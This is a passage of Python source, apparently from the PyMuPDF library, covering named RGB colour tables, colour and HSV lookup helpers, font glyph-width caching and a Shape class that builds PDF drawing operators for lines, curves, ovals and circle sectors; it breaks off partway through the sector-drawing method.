("BURLYWOOD3", 205, 170, 125), ("BURLYWOOD4", 139, 115, 85), ("CADETBLUE", 95, 158, 160), ("CADETBLUE1", 152, 245, 255), ("CADETBLUE2", 142, 229, 238), ("CADETBLUE3", 122, 197, 205), ("CADETBLUE4", 83, 134, 139), ("CHARTREUSE", 127, 255, 0), ("CHARTREUSE1", 127, 255, 0), ("CHARTREUSE2", 118, 238, 0), ("CHARTREUSE3", 102, 205, 0), ("CHARTREUSE4", 69, 139, 0), ("CHOCOLATE", 210, 105, 30), ("CHOCOLATE1", 255, 127, 36), ("CHOCOLATE2", 238, 118, 33), ("CHOCOLATE3", 205, 102, 29), ("CHOCOLATE4", 139, 69, 19), ("COFFEE", 156, 79, 0), ("CORAL", 255, 127, 80), ("CORAL1", 255, 114, 86), ("CORAL2", 238, 106, 80), ("CORAL3", 205, 91, 69), ("CORAL4", 139, 62, 47), ("CORNFLOWERBLUE", 100, 149, 237), ("CORNSILK", 255, 248, 220), ("CORNSILK1", 255, 248, 220), ("CORNSILK2", 238, 232, 205), ("CORNSILK3", 205, 200, 177), ("CORNSILK4", 139, 136, 120), ("CYAN", 0, 255, 255), ("CYAN1", 0, 255, 255), 
("CYAN2", 0, 238, 238), ("CYAN3", 0, 205, 205), ("CYAN4", 0, 139, 139), ("DARKBLUE", 0, 0, 139), ("DARKCYAN", 0, 139, 139), ("DARKGOLDENROD", 184, 134, 11), ("DARKGOLDENROD1", 255, 185, 15), ("DARKGOLDENROD2", 238, 173, 14), ("DARKGOLDENROD3", 205, 149, 12), ("DARKGOLDENROD4", 139, 101, 8), ("DARKGREEN", 0, 100, 0), ("DARKGRAY", 169, 169, 169), ("DARKKHAKI", 189, 183, 107), ("DARKMAGENTA", 139, 0, 139), ("DARKOLIVEGREEN", 85, 107, 47), ("DARKOLIVEGREEN1", 202, 255, 112), ("DARKOLIVEGREEN2", 188, 238, 104), ("DARKOLIVEGREEN3", 162, 205, 90), ("DARKOLIVEGREEN4", 110, 139, 61), ("DARKORANGE", 255, 140, 0), ("DARKORANGE1", 255, 127, 0), ("DARKORANGE2", 238, 118, 0), ("DARKORANGE3", 205, 102, 0), ("DARKORANGE4", 139, 69, 0), ("DARKORCHID", 153, 50, 204), ("DARKORCHID1", 191, 62, 255), ("DARKORCHID2", 178, 58, 238), ("DARKORCHID3", 154, 50, 205), ("DARKORCHID4", 104, 34, 139), ("DARKRED", 139, 0, 0), ("DARKSALMON", 233, 150, 122), ("DARKSEAGREEN", 143, 188, 143), ("DARKSEAGREEN1", 193, 255, 193), ("DARKSEAGREEN2", 180, 238, 180), ("DARKSEAGREEN3", 155, 205, 155), ("DARKSEAGREEN4", 105, 139, 105), ("DARKSLATEBLUE", 72, 61, 139), ("DARKSLATEGRAY", 47, 79, 79), ("DARKTURQUOISE", 0, 206, 209), ("DARKVIOLET", 148, 0, 211), ("DEEPPINK", 255, 20, 147), ("DEEPPINK1", 255, 20, 147), ("DEEPPINK2", 238, 18, 137), ("DEEPPINK3", 205, 16, 118), ("DEEPPINK4", 139, 10, 80), ("DEEPSKYBLUE", 0, 191, 255), ("DEEPSKYBLUE1", 0, 191, 255), ("DEEPSKYBLUE2", 0, 178, 238), ("DEEPSKYBLUE3", 0, 154, 205), ("DEEPSKYBLUE4", 0, 104, 139), ("DIMGRAY", 105, 105, 105), ("DODGERBLUE", 30, 144, 255), ("DODGERBLUE1", 30, 144, 255), ("DODGERBLUE2", 28, 134, 238), ("DODGERBLUE3", 24, 116, 205), ("DODGERBLUE4", 16, 78, 139), ("FIREBRICK", 178, 34, 34), ("FIREBRICK1", 255, 48, 48), ("FIREBRICK2", 238, 44, 44), ("FIREBRICK3", 205, 38, 38), ("FIREBRICK4", 139, 26, 26), ("FLORALWHITE", 255, 250, 240), ("FORESTGREEN", 34, 139, 34), ("GAINSBORO", 220, 220, 220), ("GHOSTWHITE", 248, 248, 255), ("GOLD", 255, 215, 0), 
("GOLD1", 255, 215, 0), ("GOLD2", 238, 201, 0), ("GOLD3", 205, 173, 0), ("GOLD4", 139, 117, 0), ("GOLDENROD", 218, 165, 32), ("GOLDENROD1", 255, 193, 37), ("GOLDENROD2", 238, 180, 34), ("GOLDENROD3", 205, 155, 29), ("GOLDENROD4", 139, 105, 20), ("GREEN YELLOW", 173, 255, 47), ("GREEN", 0, 255, 0), ("GREEN1", 0, 255, 0), ("GREEN2", 0, 238, 0), ("GREEN3", 0, 205, 0), ("GREEN4", 0, 139, 0), ("GREENYELLOW", 173, 255, 47), ("GRAY", 190, 190, 190), ("GRAY0", 0, 0, 0), ("GRAY1", 3, 3, 3), ("GRAY10", 26, 26, 26), ("GRAY100", 255, 255, 255), ("GRAY11", 28, 28, 28), ("GRAY12", 31, 31, 31), ("GRAY13", 33, 33, 33), ("GRAY14", 36, 36, 36), ("GRAY15", 38, 38, 38), ("GRAY16", 41, 41, 41), ("GRAY17", 43, 43, 43), ("GRAY18", 46, 46, 46), ("GRAY19", 48, 48, 48), ("GRAY2", 5, 5, 5), ("GRAY20", 51, 51, 51), ("GRAY21", 54, 54, 54), ("GRAY22", 56, 56, 56), ("GRAY23", 59, 59, 59), ("GRAY24", 61, 61, 61), ("GRAY25", 64, 64, 64), ("GRAY26", 66, 66, 66), ("GRAY27", 69, 69, 69), ("GRAY28", 71, 71, 71), ("GRAY29", 74, 74, 74), ("GRAY3", 8, 8, 8), ("GRAY30", 77, 77, 77), ("GRAY31", 79, 79, 79), ("GRAY32", 82, 82, 82), ("GRAY33", 84, 84, 84), ("GRAY34", 87, 87, 87), ("GRAY35", 89, 89, 89), ("GRAY36", 92, 92, 92), ("GRAY37", 94, 94, 94), ("GRAY38", 97, 97, 97), ("GRAY39", 99, 99, 99), ("GRAY4", 10, 10, 10), ("GRAY40", 102, 102, 102), ("GRAY41", 105, 105, 105), ("GRAY42", 107, 107, 107), ("GRAY43", 110, 110, 110), ("GRAY44", 112, 112, 112), ("GRAY45", 115, 115, 115), ("GRAY46", 117, 117, 117), ("GRAY47", 120, 120, 120), ("GRAY48", 122, 122, 122), ("GRAY49", 125, 125, 125), ("GRAY5", 13, 13, 13), ("GRAY50", 127, 127, 127), ("GRAY51", 130, 130, 130), ("GRAY52", 133, 133, 133), ("GRAY53", 135, 135, 135), ("GRAY54", 138, 138, 138), ("GRAY55", 140, 140, 140), ("GRAY56", 143, 143, 143), ("GRAY57", 145, 145, 145), ("GRAY58", 148, 148, 148), ("GRAY59", 150, 150, 150), ("GRAY6", 15, 15, 15), ("GRAY60", 153, 153, 153), ("GRAY61", 156, 156, 156), ("GRAY62", 158, 158, 158), ("GRAY63", 161, 161, 161), 
("GRAY64", 163, 163, 163), ("GRAY65", 166, 166, 166), ("GRAY66", 168, 168, 168), ("GRAY67", 171, 171, 171), ("GRAY68", 173, 173, 173), ("GRAY69", 176, 176, 176), ("GRAY7", 18, 18, 18), ("GRAY70", 179, 179, 179), ("GRAY71", 181, 181, 181), ("GRAY72", 184, 184, 184), ("GRAY73", 186, 186, 186), ("GRAY74", 189, 189, 189), ("GRAY75", 191, 191, 191), ("GRAY76", 194, 194, 194), ("GRAY77", 196, 196, 196), ("GRAY78", 199, 199, 199), ("GRAY79", 201, 201, 201), ("GRAY8", 20, 20, 20), ("GRAY80", 204, 204, 204), ("GRAY81", 207, 207, 207), ("GRAY82", 209, 209, 209), ("GRAY83", 212, 212, 212), ("GRAY84", 214, 214, 214), ("GRAY85", 217, 217, 217), ("GRAY86", 219, 219, 219), ("GRAY87", 222, 222, 222), ("GRAY88", 224, 224, 224), ("GRAY89", 227, 227, 227), ("GRAY9", 23, 23, 23), ("GRAY90", 229, 229, 229), ("GRAY91", 232, 232, 232), ("GRAY92", 235, 235, 235), ("GRAY93", 237, 237, 237), ("GRAY94", 240, 240, 240), ("GRAY95", 242, 242, 242), ("GRAY96", 245, 245, 245), ("GRAY97", 247, 247, 247), ("GRAY98", 250, 250, 250), ("GRAY99", 252, 252, 252), ("HONEYDEW", 240, 255, 240), ("HONEYDEW1", 240, 255, 240), ("HONEYDEW2", 224, 238, 224), ("HONEYDEW3", 193, 205, 193), ("HONEYDEW4", 131, 139, 131), ("HOTPINK", 255, 105, 180), ("HOTPINK1", 255, 110, 180), ("HOTPINK2", 238, 106, 167), ("HOTPINK3", 205, 96, 144), ("HOTPINK4", 139, 58, 98), ("INDIANRED", 205, 92, 92), ("INDIANRED1", 255, 106, 106), ("INDIANRED2", 238, 99, 99), ("INDIANRED3", 205, 85, 85), ("INDIANRED4", 139, 58, 58), ("IVORY", 255, 255, 240), ("IVORY1", 255, 255, 240), ("IVORY2", 238, 238, 224), ("IVORY3", 205, 205, 193), ("IVORY4", 139, 139, 131), ("KHAKI", 240, 230, 140), ("KHAKI1", 255, 246, 143), ("KHAKI2", 238, 230, 133), ("KHAKI3", 205, 198, 115), ("KHAKI4", 139, 134, 78), ("LAVENDER", 230, 230, 250), ("LAVENDERBLUSH", 255, 240, 245), ("LAVENDERBLUSH1", 255, 240, 245), ("LAVENDERBLUSH2", 238, 224, 229), ("LAVENDERBLUSH3", 205, 193, 197), ("LAVENDERBLUSH4", 139, 131, 134), ("LAWNGREEN", 124, 252, 0), ("LEMONCHIFFON", 255, 
250, 205), ("LEMONCHIFFON1", 255, 250, 205), ("LEMONCHIFFON2", 238, 233, 191), ("LEMONCHIFFON3", 205, 201, 165), ("LEMONCHIFFON4", 139, 137, 112), ("LIGHTBLUE", 173, 216, 230), ("LIGHTBLUE1", 191, 239, 255), ("LIGHTBLUE2", 178, 223, 238), ("LIGHTBLUE3", 154, 192, 205), ("LIGHTBLUE4", 104, 131, 139), ("LIGHTCORAL", 240, 128, 128), ("LIGHTCYAN", 224, 255, 255), ("LIGHTCYAN1", 224, 255, 255), ("LIGHTCYAN2", 209, 238, 238), ("LIGHTCYAN3", 180, 205, 205), ("LIGHTCYAN4", 122, 139, 139), ("LIGHTGOLDENROD", 238, 221, 130), ("LIGHTGOLDENROD1", 255, 236, 139), ("LIGHTGOLDENROD2", 238, 220, 130), ("LIGHTGOLDENROD3", 205, 190, 112), ("LIGHTGOLDENROD4", 139, 129, 76), ("LIGHTGOLDENRODYELLOW", 250, 250, 210), ("LIGHTGREEN", 144, 238, 144), ("LIGHTGRAY", 211, 211, 211), ("LIGHTPINK", 255, 182, 193), ("LIGHTPINK1", 255, 174, 185), ("LIGHTPINK2", 238, 162, 173), ("LIGHTPINK3", 205, 140, 149), ("LIGHTPINK4", 139, 95, 101), ("LIGHTSALMON", 255, 160, 122), ("LIGHTSALMON1", 255, 160, 122), ("LIGHTSALMON2", 238, 149, 114), ("LIGHTSALMON3", 205, 129, 98), ("LIGHTSALMON4", 139, 87, 66), ("LIGHTSEAGREEN", 32, 178, 170), ("LIGHTSKYBLUE", 135, 206, 250), ("LIGHTSKYBLUE1", 176, 226, 255), ("LIGHTSKYBLUE2", 164, 211, 238), ("LIGHTSKYBLUE3", 141, 182, 205), ("LIGHTSKYBLUE4", 96, 123, 139), ("LIGHTSLATEBLUE", 132, 112, 255), ("LIGHTSLATEGRAY", 119, 136, 153), ("LIGHTSTEELBLUE", 176, 196, 222), ("LIGHTSTEELBLUE1", 202, 225, 255), ("LIGHTSTEELBLUE2", 188, 210, 238), ("LIGHTSTEELBLUE3", 162, 181, 205), ("LIGHTSTEELBLUE4", 110, 123, 139), ("LIGHTYELLOW", 255, 255, 224), ("LIGHTYELLOW1", 255, 255, 224), ("LIGHTYELLOW2", 238, 238, 209), ("LIGHTYELLOW3", 205, 205, 180), ("LIGHTYELLOW4", 139, 139, 122), ("LIMEGREEN", 50, 205, 50), ("LINEN", 250, 240, 230), ("MAGENTA", 255, 0, 255), ("MAGENTA1", 255, 0, 255), ("MAGENTA2", 238, 0, 238), ("MAGENTA3", 205, 0, 205), ("MAGENTA4", 139, 0, 139), ("MAROON", 176, 48, 96), ("MAROON1", 255, 52, 179), ("MAROON2", 238, 48, 167), ("MAROON3", 205, 41, 144), ("MAROON4", 
139, 28, 98), ("MEDIUMAQUAMARINE", 102, 205, 170), ("MEDIUMBLUE", 0, 0, 205), ("MEDIUMORCHID", 186, 85, 211), ("MEDIUMORCHID1", 224, 102, 255), ("MEDIUMORCHID2", 209, 95, 238), ("MEDIUMORCHID3", 180, 82, 205), ("MEDIUMORCHID4", 122, 55, 139), ("MEDIUMPURPLE", 147, 112, 219), ("MEDIUMPURPLE1", 171, 130, 255), ("MEDIUMPURPLE2", 159, 121, 238), ("MEDIUMPURPLE3", 137, 104, 205), ("MEDIUMPURPLE4", 93, 71, 139), ("MEDIUMSEAGREEN", 60, 179, 113), ("MEDIUMSLATEBLUE", 123, 104, 238), ("MEDIUMSPRINGGREEN", 0, 250, 154), ("MEDIUMTURQUOISE", 72, 209, 204), ("MEDIUMVIOLETRED", 199, 21, 133), ("MIDNIGHTBLUE", 25, 25, 112), ("MINTCREAM", 245, 255, 250), ("MISTYROSE", 255, 228, 225), ("MISTYROSE1", 255, 228, 225), ("MISTYROSE2", 238, 213, 210), ("MISTYROSE3", 205, 183, 181), ("MISTYROSE4", 139, 125, 123), ("MOCCASIN", 255, 228, 181), ("MUPDFBLUE", 37, 114, 172), ("NAVAJOWHITE", 255, 222, 173), ("NAVAJOWHITE1", 255, 222, 173), ("NAVAJOWHITE2", 238, 207, 161), ("NAVAJOWHITE3", 205, 179, 139), ("NAVAJOWHITE4", 139, 121, 94), ("NAVY", 0, 0, 128), ("NAVYBLUE", 0, 0, 128), ("OLDLACE", 253, 245, 230), ("OLIVEDRAB", 107, 142, 35), ("OLIVEDRAB1", 192, 255, 62), ("OLIVEDRAB2", 179, 238, 58), ("OLIVEDRAB3", 154, 205, 50), ("OLIVEDRAB4", 105, 139, 34), ("ORANGE", 255, 165, 0), ("ORANGE1", 255, 165, 0), ("ORANGE2", 238, 154, 0), ("ORANGE3", 205, 133, 0), ("ORANGE4", 139, 90, 0), ("ORANGERED", 255, 69, 0), ("ORANGERED1", 255, 69, 0), ("ORANGERED2", 238, 64, 0), ("ORANGERED3", 205, 55, 0), ("ORANGERED4", 139, 37, 0), ("ORCHID", 218, 112, 214), ("ORCHID1", 255, 131, 250), ("ORCHID2", 238, 122, 233), ("ORCHID3", 205, 105, 201), ("ORCHID4", 139, 71, 137), ("PALEGOLDENROD", 238, 232, 170), ("PALEGREEN", 152, 251, 152), ("PALEGREEN1", 154, 255, 154), ("PALEGREEN2", 144, 238, 144), ("PALEGREEN3", 124, 205, 124), ("PALEGREEN4", 84, 139, 84), ("PALETURQUOISE", 175, 238, 238), ("PALETURQUOISE1", 187, 255, 255), ("PALETURQUOISE2", 174, 238, 238), ("PALETURQUOISE3", 150, 205, 205), ("PALETURQUOISE4", 102, 
139, 139), ("PALEVIOLETRED", 219, 112, 147), ("PALEVIOLETRED1", 255, 130, 171), ("PALEVIOLETRED2", 238, 121, 159), ("PALEVIOLETRED3", 205, 104, 137), ("PALEVIOLETRED4", 139, 71, 93), ("PAPAYAWHIP", 255, 239, 213), ("PEACHPUFF", 255, 218, 185), ("PEACHPUFF1", 255, 218, 185), ("PEACHPUFF2", 238, 203, 173), ("PEACHPUFF3", 205, 175, 149), ("PEACHPUFF4", 139, 119, 101), ("PERU", 205, 133, 63), ("PINK", 255, 192, 203), ("PINK1", 255, 181, 197), ("PINK2", 238, 169, 184), ("PINK3", 205, 145, 158), ("PINK4", 139, 99, 108), ("PLUM", 221, 160, 221), ("PLUM1", 255, 187, 255), ("PLUM2", 238, 174, 238), ("PLUM3", 205, 150, 205), ("PLUM4", 139, 102, 139), ("POWDERBLUE", 176, 224, 230), ("PURPLE", 160, 32, 240), ("PURPLE1", 155, 48, 255), ("PURPLE2", 145, 44, 238), ("PURPLE3", 125, 38, 205), ("PURPLE4", 85, 26, 139), ("PY_COLOR", 240, 255, 210), ("RED", 255, 0, 0), ("RED1", 255, 0, 0), ("RED2", 238, 0, 0), ("RED3", 205, 0, 0), ("RED4", 139, 0, 0), ("ROSYBROWN", 188, 143, 143), ("ROSYBROWN1", 255, 193, 193), ("ROSYBROWN2", 238, 180, 180), ("ROSYBROWN3", 205, 155, 155), ("ROSYBROWN4", 139, 105, 105), ("ROYALBLUE", 65, 105, 225), ("ROYALBLUE1", 72, 118, 255), ("ROYALBLUE2", 67, 110, 238), ("ROYALBLUE3", 58, 95, 205), ("ROYALBLUE4", 39, 64, 139), ("SADDLEBROWN", 139, 69, 19), ("SALMON", 250, 128, 114), ("SALMON1", 255, 140, 105), ("SALMON2", 238, 130, 98), ("SALMON3", 205, 112, 84), ("SALMON4", 139, 76, 57), ("SANDYBROWN", 244, 164, 96), ("SEAGREEN", 46, 139, 87), ("SEAGREEN1", 84, 255, 159), ("SEAGREEN2", 78, 238, 148), ("SEAGREEN3", 67, 205, 128), ("SEAGREEN4", 46, 139, 87), ("SEASHELL", 255, 245, 238), ("SEASHELL1", 255, 245, 238), ("SEASHELL2", 238, 229, 222), ("SEASHELL3", 205, 197, 191), ("SEASHELL4", 139, 134, 130), ("SIENNA", 160, 82, 45), ("SIENNA1", 255, 130, 71), ("SIENNA2", 238, 121, 66), ("SIENNA3", 205, 104, 57), ("SIENNA4", 139, 71, 38), ("SKYBLUE", 135, 206, 235), ("SKYBLUE1", 135, 206, 255), ("SKYBLUE2", 126, 192, 238), ("SKYBLUE3", 108, 166, 205), ("SKYBLUE4", 74, 
112, 139), ("SLATEBLUE", 106, 90, 205), ("SLATEBLUE1", 131, 111, 255), ("SLATEBLUE2", 122, 103, 238), ("SLATEBLUE3", 105, 89, 205), ("SLATEBLUE4", 71, 60, 139), ("SLATEGRAY", 112, 128, 144), ("SNOW", 255, 250, 250), ("SNOW1", 255, 250, 250), ("SNOW2", 238, 233, 233), ("SNOW3", 205, 201, 201), ("SNOW4", 139, 137, 137), ("SPRINGGREEN", 0, 255, 127), ("SPRINGGREEN1", 0, 255, 127), ("SPRINGGREEN2", 0, 238, 118), ("SPRINGGREEN3", 0, 205, 102), ("SPRINGGREEN4", 0, 139, 69), ("STEELBLUE", 70, 130, 180), ("STEELBLUE1", 99, 184, 255), ("STEELBLUE2", 92, 172, 238), ("STEELBLUE3", 79, 148, 205), ("STEELBLUE4", 54, 100, 139), ("TAN", 210, 180, 140), ("TAN1", 255, 165, 79), ("TAN2", 238, 154, 73), ("TAN3", 205, 133, 63), ("TAN4", 139, 90, 43), ("THISTLE", 216, 191, 216), ("THISTLE1", 255, 225, 255), ("THISTLE2", 238, 210, 238), ("THISTLE3", 205, 181, 205), ("THISTLE4", 139, 123, 139), ("TOMATO", 255, 99, 71), ("TOMATO1", 255, 99, 71), ("TOMATO2", 238, 92, 66), ("TOMATO3", 205, 79, 57), ("TOMATO4", 139, 54, 38), ("TURQUOISE", 64, 224, 208), ("TURQUOISE1", 0, 245, 255), ("TURQUOISE2", 0, 229, 238), ("TURQUOISE3", 0, 197, 205), ("TURQUOISE4", 0, 134, 139), ("VIOLET", 238, 130, 238), ("VIOLETRED", 208, 32, 144), ("VIOLETRED1", 255, 62, 150), ("VIOLETRED2", 238, 58, 140), ("VIOLETRED3", 205, 50, 120), ("VIOLETRED4", 139, 34, 82), ("WHEAT", 245, 222, 179), ("WHEAT1", 255, 231, 186), ("WHEAT2", 238, 216, 174), ("WHEAT3", 205, 186, 150), ("WHEAT4", 139, 126, 102), ("WHITE", 255, 255, 255), ("WHITESMOKE", 245, 245, 245), ("YELLOW", 255, 255, 0), ("YELLOW1", 255, 255, 0), ("YELLOW2", 238, 238, 0), ("YELLOW3", 205, 205, 0), ("YELLOW4", 139, 139, 0), ("YELLOWGREEN", 154, 205, 50), ] def getColor(name): """Retrieve RGB color in PDF format by name. Returns: a triple of floats in range 0 to 1. In case of name-not-found, "white" is returned. """ try: c = getColorInfoList()[getColorList().index(name.upper())] return (c[1] / 255., c[2] / 255., c[3] / 255.) 
except:
        # NOTE(review): bare except deliberately maps any lookup failure
        # (unknown name) to white — consider narrowing to ValueError.
        return (1, 1, 1)


def getColorHSV(name):
    """Retrieve the hue, saturation, value triple of a color name.

    Returns:
        a triple (degree, percent, percent). If not found (-1, -1, -1)
        is returned.
    """
    try:
        x = getColorInfoList()[getColorList().index(name.upper())]
    except:
        # unknown colour name: sentinel triple
        return (-1, -1, -1)

    # standard RGB -> HSV conversion on channels normalized to [0, 1]
    r = x[1] / 255.
    g = x[2] / 255.
    b = x[3] / 255.
    cmax = max(r, g, b)
    V = round(cmax * 100, 1)
    cmin = min(r, g, b)
    delta = cmax - cmin
    if delta == 0:
        hue = 0
    elif cmax == r:
        hue = 60. * (((g - b)/delta) % 6)
    elif cmax == g:
        hue = 60. * (((b - r)/delta) + 2)
    else:
        hue = 60. * (((r - g)/delta) + 4)

    H = int(round(hue))
    if cmax == 0:
        sat = 0
    else:
        sat = delta / cmax
    S = int(round(sat * 100))

    return (H, S, V)


def getCharWidths(doc, xref, limit = 256, idx = 0):
    """Get list of glyph information of a font.

    Notes:
        Must be provided by its XREF number. If we already dealt with the
        font, it will be recorded in doc.FontInfos. Otherwise we insert an
        entry there.
        Finally we return the glyphs for the font. This is a list of
        (glyph, width) where glyph is an integer controlling the char
        appearance, and width is a float controlling the char's spacing:
        width * fontsize is the actual space.
        For 'simple' fonts, glyph == ord(char) will usually be true.
        Exceptions are 'Symbol' and 'ZapfDingbats'. We are providing data
        for these directly here.
    """
    fontinfo = CheckFontInfo(doc, xref)
    if fontinfo is None:  # not recorded yet: create it
        name, ext, stype, _ = doc.extractFont(xref, info_only = True)
        fontdict = {"name": name, "type": stype, "ext": ext}

        if ext == "":
            raise ValueError("xref is not a font")

        # check for 'simple' fonts
        if stype in ("Type1", "MMType1", "TrueType"):
            simple = True
        else:
            simple = False

        # check for CJK fonts
        # NOTE(review): "Fangti" looks like a typo for a CJK font family
        # name — kept verbatim; verify against the C-level name source.
        if name in ("Fangti", "Ming"):
            ordering = 0
        elif name in ("Heiti", "Song"):
            ordering = 1
        elif name in ("Gothic", "Mincho"):
            ordering = 2
        elif name in ("Dotum", "Batang"):
            ordering = 3
        else:
            ordering = -1

        fontdict["simple"] = simple

        if name == "ZapfDingbats":
            glyphs = zapf_glyphs
        elif name == "Symbol":
            glyphs = symbol_glyphs
        else:
            glyphs = None

        fontdict["glyphs"] = glyphs
        fontdict["ordering"] = ordering
        fontinfo = [xref, fontdict]
        doc.FontInfos.append(fontinfo)
    else:
        fontdict = fontinfo[1]
        glyphs = fontdict["glyphs"]
        simple = fontdict["simple"]
        ordering = fontdict["ordering"]

    if glyphs is None:
        oldlimit = 0
    else:
        oldlimit = len(glyphs)

    mylimit = max(256, limit)
    if mylimit <= oldlimit:
        # cached glyph list already long enough
        return glyphs

    if ordering < 0:  # not a CJK font
        glyphs = doc._getCharWidths(xref, fontdict["name"],
                                    fontdict["ext"],
                                    fontdict["ordering"],
                                    mylimit, idx)
    else:  # CJK fonts use char codes and width = 1
        glyphs = None

    fontdict["glyphs"] = glyphs
    fontinfo[1] = fontdict
    UpdateFontInfo(doc, fontinfo)
    return glyphs


class Shape(object):
    """Create a new shape.
    """

    @staticmethod
    def horizontal_angle(C, P):
        """Return the angle to the horizontal for the connection from C to P.

        This uses the arcus sine function and resolves its inherent
        ambiguity by looking up in which quadrant vector S = P - C is
        located.
        """
        S = Point(P - C).unit  # unit vector 'C' -> 'P'
        alfa = math.asin(abs(S.y))  # absolute angle from horizontal
        if S.x < 0:  # make arcsin result unique
            if S.y <= 0:  # bottom-left
                alfa = -(math.pi - alfa)
            else:  # top-left
                alfa = math.pi - alfa
        else:
            if S.y >= 0:  # top-right
                pass
            else:  # bottom-right
                alfa = - alfa
        return alfa

    def __init__(self, page):
        CheckParent(page)
        self.page = page
        self.doc = page.parent
        if not self.doc.isPDF:
            raise ValueError("not a PDF")
        self.height = page.MediaBoxSize.y
        self.width = page.MediaBoxSize.x
        self.x = page.CropBoxPosition.x
        self.y = page.CropBoxPosition.y
        self.pctm = page._getTransformation()  # page transf. matrix
        self.ipctm = ~self.pctm  # inverted transf. matrix
        self.draw_cont = ""   # accumulated path-drawing commands
        self.text_cont = ""   # accumulated text commands
        self.totalcont = ""   # final /Contents source
        self.lastPoint = None
        self.rect = None

    def updateRect(self, x):
        # grow self.rect to include point or rect 'x'
        # (len(x) == 2 means a point-like, else a rect-like)
        if self.rect is None:
            if len(x) == 2:
                self.rect = Rect(x, x)
            else:
                self.rect = Rect(x)
        else:
            if len(x) == 2:
                x = Point(x)
                self.rect.x0 = min(self.rect.x0, x.x)
                self.rect.y0 = min(self.rect.y0, x.y)
                self.rect.x1 = max(self.rect.x1, x.x)
                self.rect.y1 = max(self.rect.y1, x.y)
            else:
                x = Rect(x)
                self.rect.x0 = min(self.rect.x0, x.x0)
                self.rect.y0 = min(self.rect.y0, x.y0)
                self.rect.x1 = max(self.rect.x1, x.x1)
                self.rect.y1 = max(self.rect.y1, x.y1)

    def drawLine(self, p1, p2):
        """Draw a line between two points.
        """
        p1 = Point(p1)
        p2 = Point(p2)
        if not (self.lastPoint == p1):
            # emit a 'moveto' only if we are not already at p1
            self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm)
            self.lastPoint = p1
            self.updateRect(p1)

        self.draw_cont += "%g %g l\n" % JM_TUPLE(p2 * self.ipctm)
        self.updateRect(p2)
        self.lastPoint = p2
        return self.lastPoint

    def drawPolyline(self, points):
        """Draw several connected line segments.
        """
        for i, p in enumerate(points):
            if i == 0:
                if not (self.lastPoint == Point(p)):
                    self.draw_cont += "%g %g m\n" % JM_TUPLE(Point(p) * self.ipctm)
                    self.lastPoint = Point(p)
            else:
                self.draw_cont += "%g %g l\n" % JM_TUPLE(Point(p) * self.ipctm)
            self.updateRect(p)

        self.lastPoint = Point(points[-1])
        return self.lastPoint

    def drawBezier(self, p1, p2, p3, p4):
        """Draw a standard cubic Bezier curve.
        """
        p1 = Point(p1)
        p2 = Point(p2)
        p3 = Point(p3)
        p4 = Point(p4)
        if not (self.lastPoint == p1):
            self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm)
        self.draw_cont += "%g %g %g %g %g %g c\n" % JM_TUPLE(list(p2 * self.ipctm) + \
                                                             list(p3 * self.ipctm) + \
                                                             list(p4 * self.ipctm))
        self.updateRect(p1)
        self.updateRect(p2)
        self.updateRect(p3)
        self.updateRect(p4)
        self.lastPoint = p4
        return self.lastPoint

    def drawOval(self, tetra):
        """Draw an ellipse inside a tetrapod.
        """
        if len(tetra) != 4:
            raise ValueError("invalid arg length")
        if hasattr(tetra[0], "__float__"):
            q = Rect(tetra).quad
        else:
            q = Quad(tetra)

        # edge midpoints: top, right, bottom, left
        mt = q.ul + (q.ur - q.ul) * 0.5
        mr = q.ur + (q.lr - q.ur) * 0.5
        mb = q.ll + (q.lr - q.ll) * 0.5
        ml = q.ul + (q.ll - q.ul) * 0.5
        if not (self.lastPoint == ml):
            self.draw_cont += "%g %g m\n" % JM_TUPLE(ml * self.ipctm)
            self.lastPoint = ml
        # approximate the ellipse by four quarter curves
        self.drawCurve(ml, q.ll, mb)
        self.drawCurve(mb, q.lr, mr)
        self.drawCurve(mr, q.ur, mt)
        self.drawCurve(mt, q.ul, ml)
        self.updateRect(q.rect)
        self.lastPoint = ml
        return self.lastPoint

    def drawCircle(self, center, radius):
        """Draw a circle given its center and radius.
        """
        if not radius > EPSILON:
            # NOTE(review): "postive" is a typo in this runtime message;
            # left unchanged here because it is program output.
            raise ValueError("radius must be postive")
        center = Point(center)
        p1 = center - (radius, 0)
        return self.drawSector(center, p1, 360, fullSector=False)

    def drawCurve(self, p1, p2, p3):
        """Draw a curve between points using one control point.

        The Bezier control points are derived on segments p1->p2 and
        p3->p2 using the circle approximation constant kappa.
        """
        kappa = 0.55228474983
        p1 = Point(p1)
        p2 = Point(p2)
        p3 = Point(p3)
        k1 = p1 + (p2 - p1) * kappa
        k2 = p3 + (p2 - p3) * kappa
        return self.drawBezier(p1, k1, k2, p3)

    def drawSector(self, center, point, beta, fullSector=True):
        """Draw a circle sector.
        """
        center = Point(center)
        point = Point(point)
        # PDF operator templates: moveto, curveto, lineto
        l3 = "%g %g m\n"
        l4 = "%g %g %g %g %g %g c\n"
        l5 = "%g %g l\n"
        betar = math.radians(-beta)
        w360 = math.radians(math.copysign(360, betar)) * (-1)
        w90 = math.radians(math.copysign(90, betar))
        w45 = w90 / 2
        while abs(betar) > 2 * math.pi:
            betar += w360  # bring angle below 360 degrees
        if not (self.lastPoint == point):
            self.draw_cont += l3 % JM_TUPLE(point * self.ipctm)
            self.lastPoint = point
        Q = Point(0, 0)  # just make sure it exists
        C = center
        P = point
        S = P - C  # vector 'center' -> 'point'
        rad = abs(S)  # circle radius

        if not rad > EPSILON:
            raise ValueError("radius must be positive")

        alfa = self.horizontal_angle(center, point)
        while abs(betar) > abs(w90):  # draw 90 degree arcs
            q1 = C.x + math.cos(alfa + w90) * rad
            q2 = C.y + math.sin(alfa + w90) * rad
            Q = Point(q1, q2)  # the arc's end point
            r1 = C.x + math.cos(alfa + w45) * rad / math.cos(w45)
            r2 = C.y + math.sin(alfa + w45) * rad / math.cos(w45)
            R = Point(r1, r2)  # crossing point of tangents
            kappah = (1 - math.cos(w45)) * 4 / 3 / abs(R - Q)
            kappa = kappah * abs(P - Q)
            cp1 = P + (R - P) * kappa  # control point 1
            cp2 = Q + (R - Q) * kappa  # control point 2
            self.draw_cont += l4 % JM_TUPLE(list(cp1 * self.ipctm) + \
                                            list(cp2 * self.ipctm) + \
                                            list(Q * self.ipctm))
            betar -= w90  # reduce parm angle by 90 deg
            alfa += w90  # advance start angle by 90 deg
            P = Q  # advance to arc end point

        # draw (remaining) arc
        if abs(betar) > 1e-3:  # significant degrees left?
            beta2 = betar / 2
            q1 = C.x + math.cos(alfa + betar) * rad
